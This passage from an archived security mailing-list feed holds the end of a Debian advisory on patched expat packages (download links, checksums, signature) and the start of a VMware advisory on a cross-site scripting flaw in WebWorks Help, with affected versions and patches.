&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 168162 01b2166f38485842aab660f0a397487a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 136330 11942d4c9c36b25882db662b9edf1981
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 210542 54ea496b626a1875b6d7cf7519008ec3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 131876 8c8a91854bf5ee9eec30fda926519bef
&lt;br&gt;&lt;br&gt;ia64 architecture (Intel ia64)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;27426 7d194ae6b0473db3ff5470c10938d964
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 206162 b5b5cd0448f4d4405e547083158d0b33
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 291698 3c2fa7560629d402db2fe09cacf78d65
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_ia64.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_ia64.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;98262 d2fe5be42499f8cc35727ad1febaba15
&lt;br&gt;&lt;br&gt;mips architecture (MIPS (Big Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 234414 c1fe34bff578c026a950a7c3f4c4d771
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_mips.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_mips.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;61214 4670ea4ec04854955699ef5d1115322f
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;23794 294282bd2e09d86cdcecb2c7be16a2c7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 132784 8ee0a7eabf9781a087dccc9348d9e5c0
&lt;br&gt;&lt;br&gt;mipsel architecture (MIPS (Little Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 224124 d846357e369b14081f16cc1576bda554
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 131716 ab80da25bb702bf1eda5659949931cf3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_mipsel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_mipsel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;23812 0eab513e87cdc4b6af912e8c9b9eb97d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_mipsel.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_mipsel.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;60652 571cd4e1defdffbd231b4f1c30317933
&lt;br&gt;&lt;br&gt;powerpc architecture (PowerPC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 140454 57b59323a8fd3f989c4b887a2f435edc
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 143938 14c14076db484cc958e72b9fc4c566db
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 280288 9fadfb58e2302a8b6f57297e65dfd8d3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;26806 72bac1cc1d74623ba6494645bc4289ab
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 156730 2aca152555c73b700d1726d1eded7fe4
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_powerpc.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_powerpc.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;64998 989f172b6599508c436bc5a09c91c4f5
&lt;br&gt;&lt;br&gt;s390 architecture (IBM S/390)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 220156 c7fc9bb8b053a250ab3e37bfb2bb5f48
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;24202 f1db3ff06b30af0f9a37669346b03647
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 134506 d64a081f5c330c143361c5a1adfbe960
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 134478 45bf7476a951dd3d6fb44a230c507f20
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 173076 c2cb8d4e8b9c5f0aaf3700e6efad34e8
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_s390.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_s390.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;61936 c87e11d3c3759892c3d6b6f418c2bb95
&lt;br&gt;&lt;br&gt;sparc architecture (Sun SPARC/UltraSPARC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_sparc.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_sparc.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;57658 13a0ac88f44285d0d86dcd38d3deff70
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 133572 8bab47cce6aabb7d2038c6d528ff02a3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;23164 4a504bfeb56ecce8f1b7aaaee11b138b
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 171696 8e6d324c284db7a61854d544cb49418e
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 125636 1ab1d2f419627c15d5fb557c515937f6
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 216610 ec3f0144dd15d23fb9bc188b52a26f78
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; These files will probably be moved into the stable distribution on
&lt;br&gt;&amp;nbsp; its next update.
&lt;br&gt;&lt;br&gt;- ---------------------------------------------------------------------------------
&lt;br&gt;For apt-get: deb &lt;a href=&quot;http://security.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/&lt;/a&gt;&amp;nbsp;stable/updates main
&lt;br&gt;For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
&lt;br&gt;Mailing list: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26812816&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;debian-security-announce@...&lt;/a&gt;
&lt;br&gt;Package info: `apt-cache show &amp;lt;pkg&amp;gt;' and &lt;a href=&quot;http://packages.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://packages.debian.org/&lt;/a&gt;&amp;lt;pkg&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iD8DBQFLJ++jbxelr8HyTqQRAne2AJ0XhVqrv1+W8I5uFhFjeybYIrvTAwCgoWfG
&lt;br&gt;FASZTGkJPeI/o5ja76ls01w=
&lt;br&gt;=XgUm
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-SECURITY---DSA-1953-1--New-expat-packages-fix-denial-of-service-tp26812816p26812816.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26799884</id>
	<title>VMSA-2009-0017 VMware vCenter, ESX patch and vCenter Lab Manager releases address cross-site scripting issues</title>
	<published>2009-12-15T10:33:49Z</published>
	<updated>2009-12-15T10:33:49Z</updated>
	<author>
		<name>VMware Security Team</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- -----------------------------------------------------------------------
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;VMware Security Advisory
&lt;br&gt;&lt;br&gt;Advisory ID: &amp;nbsp; &amp;nbsp; &amp;nbsp; VMSA-2009-0017
&lt;br&gt;Synopsis: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;VMware vCenter, ESX patch and vCenter Lab Manager
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;releases address cross-site scripting issues
&lt;br&gt;Issue date: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;2009-12-15
&lt;br&gt;Updated on: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;2009-12-15 (initial release of advisory)
&lt;br&gt;CVE numbers: &amp;nbsp; &amp;nbsp; &amp;nbsp; CVE-2009-3731
&lt;br&gt;- -----------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;1. Summary
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware vCenter and ESX update releases address cross-site scripting
&lt;br&gt;&amp;nbsp; &amp;nbsp; issues in the Help functionality of WebAccess. A vCenter Lab Manager
&lt;br&gt;&amp;nbsp; &amp;nbsp; release addresses the same issues which are present in the online
&lt;br&gt;&amp;nbsp; &amp;nbsp; Help functionality of Lab Manager and Stage Manager.
&lt;br&gt;&lt;br&gt;2. Relevant releases
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; ESX 4.0 without patch ESX400-200911223-UG
&lt;br&gt;&amp;nbsp; &amp;nbsp; vCenter 4.0 GA
&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware Server 2.0.2
&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware Lab Manager 2.x
&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware vCenter Lab Manager 3.x
&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware vCenter Lab Manager 4.0
&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware vCenter Stage Manager 1.x
&lt;br&gt;&lt;br&gt;3. Problem Description
&lt;br&gt;&lt;br&gt;&amp;nbsp;a. WebWorks Help - Cross-site scripting vulnerability
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; WebWorks Help is an output format that allows online Help to be
&lt;br&gt;&amp;nbsp; &amp;nbsp; delivered on multiple platforms and browsers, which makes it easy
&lt;br&gt;&amp;nbsp; &amp;nbsp; to publish information on the Web or on an enterprise intranet.
&lt;br&gt;&amp;nbsp; &amp;nbsp; WebWorks Help is used for creating the online help pages that are
&lt;br&gt;&amp;nbsp; &amp;nbsp; available in VMware WebAccess, Lab Manager and Stage Manager.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; WebWorks Help doesn't sufficiently sanitize incoming requests which
&lt;br&gt;&amp;nbsp; &amp;nbsp; may result in cross-site scripting vulnerabilities in applications
&lt;br&gt;&amp;nbsp; &amp;nbsp; that are built with WebWorks Help.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Exploitation of these vulnerabilities in VMware products requires
&lt;br&gt;&amp;nbsp; &amp;nbsp; tricking a user to click on a malicious link or to open a malicious
&lt;br&gt;&amp;nbsp; &amp;nbsp; web page while they are logged in into vCenter, ESX or VMware
&lt;br&gt;&amp;nbsp; &amp;nbsp; Server using WebAccess, or logged in into Stage Manager or Lab
&lt;br&gt;&amp;nbsp; &amp;nbsp; Manager.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Successful exploitation can lead to theft of user credentials. These
&lt;br&gt;&amp;nbsp; &amp;nbsp; vulnerabilities can be exploited remotely only if the attacker has
&lt;br&gt;&amp;nbsp; &amp;nbsp; access to the Service Console network.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Security best practices provided by VMware recommend that the
&lt;br&gt;&amp;nbsp; &amp;nbsp; Service Console be isolated from the VM network. Please see
&lt;br&gt;&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.vmware.com/resources/techresources/726&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vmware.com/resources/techresources/726&lt;/a&gt;&amp;nbsp;for more
&lt;br&gt;&amp;nbsp; &amp;nbsp; information on VMware security best practices.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Client-side protection measures included with current browsers are not
&lt;br&gt;&amp;nbsp; &amp;nbsp; always able to prevent these attacks from being executed.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware would like to thank Daniel Grzelak and Alex Kouzemtchenko of
&lt;br&gt;&amp;nbsp; &amp;nbsp; stratsec (www.stratsec.net) for finding and reporting this issue.
&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware would also like to thank Ben Allums of WebWorks.com for working
&lt;br&gt;&amp;nbsp; &amp;nbsp; on the remediation of this issue with us.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; The Common Vulnerabilities and Exposures project (cve.mitre.org) has
&lt;br&gt;&amp;nbsp; &amp;nbsp; assigned the name CVE-2009-3731 to this issue.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; The following table lists what action remediates the vulnerability
&lt;br&gt;&amp;nbsp; &amp;nbsp; (column 4) if a solution is available.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; VMware &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Product &amp;nbsp; Running &amp;nbsp;Replace with/
&lt;br&gt;&amp;nbsp; &amp;nbsp; Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Version &amp;nbsp; on &amp;nbsp; &amp;nbsp; &amp;nbsp; Apply Patch
&lt;br&gt;&amp;nbsp; &amp;nbsp; ============= &amp;nbsp;======== &amp;nbsp;======= &amp;nbsp;=================
&lt;br&gt;&amp;nbsp; &amp;nbsp; vCenter &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; Windows &amp;nbsp;Update 1
&lt;br&gt;&amp;nbsp; &amp;nbsp; VirtualCenter &amp;nbsp;2.5 &amp;nbsp; &amp;nbsp; &amp;nbsp; Windows &amp;nbsp;not affected
&lt;br&gt;&amp;nbsp; &amp;nbsp; VirtualCenter &amp;nbsp;2.0.2 &amp;nbsp; &amp;nbsp; Windows &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Workstation &amp;nbsp; &amp;nbsp;any &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Player &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Server &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 2.0.2 &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;VMware KB 1016594
&lt;br&gt;&amp;nbsp; &amp;nbsp; Server &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; ACE &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;any &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Fusion &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; ESXi &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp; ESXi &amp;nbsp; &amp;nbsp; not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp;ESX400-200911223-UG
&lt;br&gt;&amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;3.5 &amp;nbsp; &amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;3.0.3 &amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;2.5.5 &amp;nbsp; &amp;nbsp; ESX &amp;nbsp; &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; vMA &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; RHEL5 &amp;nbsp; &amp;nbsp;not affected
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Lab Manager &amp;nbsp; &amp;nbsp;any &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;Lab Manager 4.0.1
